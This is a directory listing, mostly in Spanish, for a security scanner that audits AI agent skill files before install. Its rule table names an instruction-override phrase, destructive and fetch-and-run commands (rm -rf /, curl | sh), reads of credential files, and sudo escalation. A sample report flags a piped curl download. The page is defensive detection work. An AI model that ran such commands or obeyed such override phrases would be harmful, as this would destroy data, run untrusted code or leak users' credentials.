Skip to main content
Glama
sudo-ai-git

mcp-skill-sec

by sudo-ai-git

mcp-skill-sec

Un servidor del Model Context Protocol (MCP) que audita cualquier skill de agente, prompt de sistema o colección de archivos descargada contra los 8 patrones de cadena de suministro de skills maliciosas.

Determinista, sin LLM, sin llamadas de red — un escáner autoalojable previo a la instalación que funciona con Claude Code, Cursor, Copilot, OpenClaw, Codex CLI y cualquier agente compatible con MCP.

Qué busca (reglas R1–R8)

Regla

Patrón

R1

Inyección de prompt / secuestro de instrucciones (ignore previous instructions, directivas de secreto, anulaciones de identidad)

R2

Intento de exfiltración de datos (enviar/publicar/mandar por email contenidos a una URL, robo de logs)

R3

Secretos / credenciales hardcodeados (claves de API, PATs, claves privadas, cadenas de conexión)

R4

Comandos peligrosos (rm -rf /, curl | sh, bombas fork, escrituras directas a dispositivos)

R5

Ofuscación / comportamiento oculto (base64-exec, eval/exec, caracteres de ancho cero)

R6

Obtenciones externas no confiables (fetch-and-run, instalaciones no PyPI)

R7

Acceso a credenciales (lectura de ~/.ssh, .aws/credentials, .env)

R8

Escalada de privilegios (sudo -s, setuid, añadir al grupo sudo)

Cada hallazgo incluye una severity (critical/high/medium/low), un número de línea y la línea de evidencia correspondiente. El veredicto general es PASS solo cuando no hay hallazgos critical/high y todos los hallazgos medium son benignos.

Related MCP server: Heron

Herramientas

  • audit_text(text, filename) — audita una cadena (una skill que te pegaron, un prompt de sistema que no escribiste).

  • audit_skill_file(path) — audita un SKILL.md / AGENTS.md / CLAUDE.md en disco, con evidencia numerada por línea.

  • audit_directory(path, pattern) — audita una colección completa de skills descargadas; devuelve veredictos por archivo + un resumen.

  • rule_list() — muestra el catálogo de reglas.

Instalación y ejecución

pip install mcp
mcp install mcp_server.py  --name skill-sec          # register with Claude Desktop
# or run manually over stdio:
python3 mcp_server.py

Configuración de Claude Desktop / agente

{
  "mcpServers": {
    "skill-sec": {
      "command": "python3",
      "args": ["/absolute/path/to/mcp_server.py"]
    }
  }
}

Ejemplo

skill-sec: /tmp/downloaded-skill/SKILL.md
  verdict : FLAG
  counts  : critical 1, high 2, medium 1, low 0
  R3 [critical] line 11: api_key = "sk-live-…"
  R3 [high]     line 14: password = "hunter2"
  R4 [critical] line 22: curl https://x/y.sh | sh
  action : remove the literal secrets, drop the fetch-and-run, re-audit

Licencia y procedencia

MIT. Escrito por sudo-ai-git. Esta es una herramienta de seguridad/verificación independiente; no codifica ningún método propietario. Es la expresión MCP de la skill de agente skill-sec (las mismas reglas, invocable como servidor en lugar de como skill).

Metadatos del Registro MCP oficial

mcp-name: io.github.sudo-ai-git/mcp-skill-sec

A
license - permissive license
Not graded
quality - not tested
C
maintenance

Maintenance

Maintainers
Response time
Release cycle
Releases (12mo)
Commit activity

Resources

Unclaimed servers have limited discoverability.

Looking for Admin?

If you are the server author, to access and configure the admin panel.

Related MCP Servers

  • F
    license
    Not graded
    quality
    B
    maintenance
    Static security scanner for AI agent skill packages that detects malicious SKILL.md files and bundled scripts before they run.
    15
  • A
    license
    Not graded
    quality
    B
    maintenance
    Security scanning for AI agent skills, MCP servers, and agent prompts, returning signed trust scores and detailed findings.
    MIT
  • A
    license
    Not graded
    quality
    B
    maintenance
    Provides audit_plugin_health and prepare_semantic_review tools for deterministic inspection of Codex plugins and Agent Skills, generating evidence-backed reports without executing or transmitting target code.
    1
    MIT
  • A
    license
    Not graded
    quality
    D
    maintenance
    Security scanner for AI agent skills, providing tools to scan skill files for threats such as credential theft and prompt injection.
    MIT

View all related MCP servers

Related MCP Connectors

  • Scan agent skills and MCP servers for malicious patterns before you load them

  • Scan GitHub-hosted AI skills for vulnerabilities: prompt injection, malware, OWASP LLM Top 10.

  • Read-only tools over the Safer Agentic AI framework: 238 patterns + 14 heuristics.

View all MCP Connectors

Latest Blog Posts

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/sudo-ai-git/mcp-skill-sec'

If you have feedback or need assistance with the MCP directory API, please join our Discord server